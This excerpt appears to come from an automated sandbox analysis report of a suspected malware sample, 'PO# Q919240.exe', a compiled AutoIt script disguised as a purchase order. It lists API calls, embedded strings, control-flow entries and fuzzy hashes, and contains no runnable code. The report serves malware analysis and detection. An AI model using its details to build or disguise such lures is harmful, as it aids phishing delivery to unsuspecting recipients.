                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                • String ID: C:\Users\user\Desktop\PO# Q919240.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                • API String ID: 2495805114-200005380
                • Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                • Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                Control-flow Graph

                • Executed
                • Not Executed
                [Control-flow graph residue: the node/edge listing of the rendered graph is not reproduced here. The graph covers function 40e500 (basic blocks 40e500-40e65d and 427616-4276df); calls shown on it: 40bc70, GetVersionExW, 402160, 40e660, 40e680, 40ef60, GetCurrentProcess, 40ef20, 40efd0, GetSystemInfo, 40ef90, GetNativeSystemInfo, FreeLibrary.]
                APIs
                • GetVersionExW.KERNEL32(?), ref: 0040E52A
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                • FreeLibrary.KERNEL32(?), ref: 0040E642
                • FreeLibrary.KERNEL32(?), ref: 0040E654
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                • String ID: 0SH
                • API String ID: 3363477735-851180471
                • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                APIs
                • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: IsThemeActive$uxtheme.dll
                • API String ID: 2574300362-3542929980
                • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                APIs
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                • TranslateMessage.USER32(?), ref: 00409556
                • DispatchMessageW.USER32(?), ref: 00409561
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Message$Peek$DispatchSleepTranslate
                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                • API String ID: 1762048999-758534266
                • Opcode ID: 65ef02fb38a27282c9e7cf101ebea7aa72ed4640524a943440740a68ee139f81
                • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                • Opcode Fuzzy Hash: 65ef02fb38a27282c9e7cf101ebea7aa72ed4640524a943440740a68ee139f81
                • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                Control-flow Graph

                APIs
                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO# Q919240.exe,00000104,?), ref: 00401F4C
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • __wcsicoll.LIBCMT ref: 00402007
                • __wcsicoll.LIBCMT ref: 0040201D
                • __wcsicoll.LIBCMT ref: 00402033
                  • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                • __wcsicoll.LIBCMT ref: 00402049
                • _wcscpy.LIBCMT ref: 0040207C
                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO# Q919240.exe,00000104), ref: 00428B5B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\PO# Q919240.exe$CMDLINE$CMDLINERAW
                • API String ID: 3948761352-3249640725
                • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __fread_nolock$_fseek_wcscpy
                • String ID: D)E$D)E$FILE
                • API String ID: 3888824918-361185794
                • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                Control-flow Graph

                APIs
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                • __wsplitpath.LIBCMT ref: 0040E41C
                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                • _wcsncat.LIBCMT ref: 0040E433
                • __wmakepath.LIBCMT ref: 0040E44F
                  • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                • _wcscpy.LIBCMT ref: 0040E487
                  • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                • _wcscat.LIBCMT ref: 00427541
                • _wcslen.LIBCMT ref: 00427551
                • _wcslen.LIBCMT ref: 00427562
                • _wcscat.LIBCMT ref: 0042757C
                • _wcsncpy.LIBCMT ref: 004275BC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                • String ID: Include$\
                • API String ID: 3173733714-3429789819
                • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                Control-flow Graph

                APIs
                • _fseek.LIBCMT ref: 0045292B
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                • __fread_nolock.LIBCMT ref: 00452961
                • __fread_nolock.LIBCMT ref: 00452971
                • __fread_nolock.LIBCMT ref: 0045298A
                • __fread_nolock.LIBCMT ref: 004529A5
                • _fseek.LIBCMT ref: 004529BF
                • _malloc.LIBCMT ref: 004529CA
                • _malloc.LIBCMT ref: 004529D6
                • __fread_nolock.LIBCMT ref: 004529E7
                • _free.LIBCMT ref: 00452A17
                • _free.LIBCMT ref: 00452A20
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                • String ID:
                • API String ID: 1255752989-0
                • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                Control-flow Graph

                APIs
                • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                • RegisterClassExW.USER32(00000030), ref: 004104ED
                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                • ImageList_ReplaceIcon.COMCTL32(00A623D8,000000FF,00000000), ref: 00410552
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                • API String ID: 2914291525-1005189915
                • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                Control-flow Graph

                APIs
                • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                • LoadIconW.USER32(?,00000063), ref: 004103C0
                • LoadIconW.USER32(?,000000A4), ref: 004103D3
                • LoadIconW.USER32(?,000000A2), ref: 004103E6
                • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                • RegisterClassExW.USER32(?), ref: 0041045D
                  • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                  • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                  • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                  • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                  • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                  • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                  • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00A623D8,000000FF,00000000), ref: 00410552
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                • String ID: #$0$AutoIt v3
                • API String ID: 423443420-4155596026
                • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _malloc
                • String ID: Default
                • API String ID: 1579825452-753088835
                • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __fread_nolock_fseek_memmove_strcat
                • String ID: AU3!$EA06
                • API String ID: 1268643489-2658333250
                • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                Control-flow Graph

                APIs
                • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                • KillTimer.USER32(?,00000001,?), ref: 004011B9
                • PostQuitMessage.USER32(00000000), ref: 004011CB
                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                • CreatePopupMenu.USER32 ref: 00401204
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                • String ID: TaskbarCreated
                • API String ID: 129472671-2362178303
                • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                Control-flow Graph

                APIs
                • _malloc.LIBCMT ref: 004115F1
                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                • std::exception::exception.LIBCMT ref: 00411626
                • std::exception::exception.LIBCMT ref: 00411640
                • __CxxThrowException@8.LIBCMT ref: 00411651
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                • String ID: ,*H$4*H$@fI
                • API String ID: 615853336-1459471987
                • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                Control-flow Graph

                APIs
                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04264721
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04264947
                Memory Dump Source
                • Source File: 00000000.00000002.1467809739.0000000004262000.00000040.00000020.00020000.00000000.sdmp, Offset: 04262000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4262000_PO# Q919240.jbxd
                Similarity
                • API ID: CreateFileFreeVirtual
                • String ID:
                • API String ID: 204039940-0
                • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                • Instruction ID: fe9a0efe5b5faf39e1f386f2fba5aaef37a6522b4096352a58ea17f4ff85176f
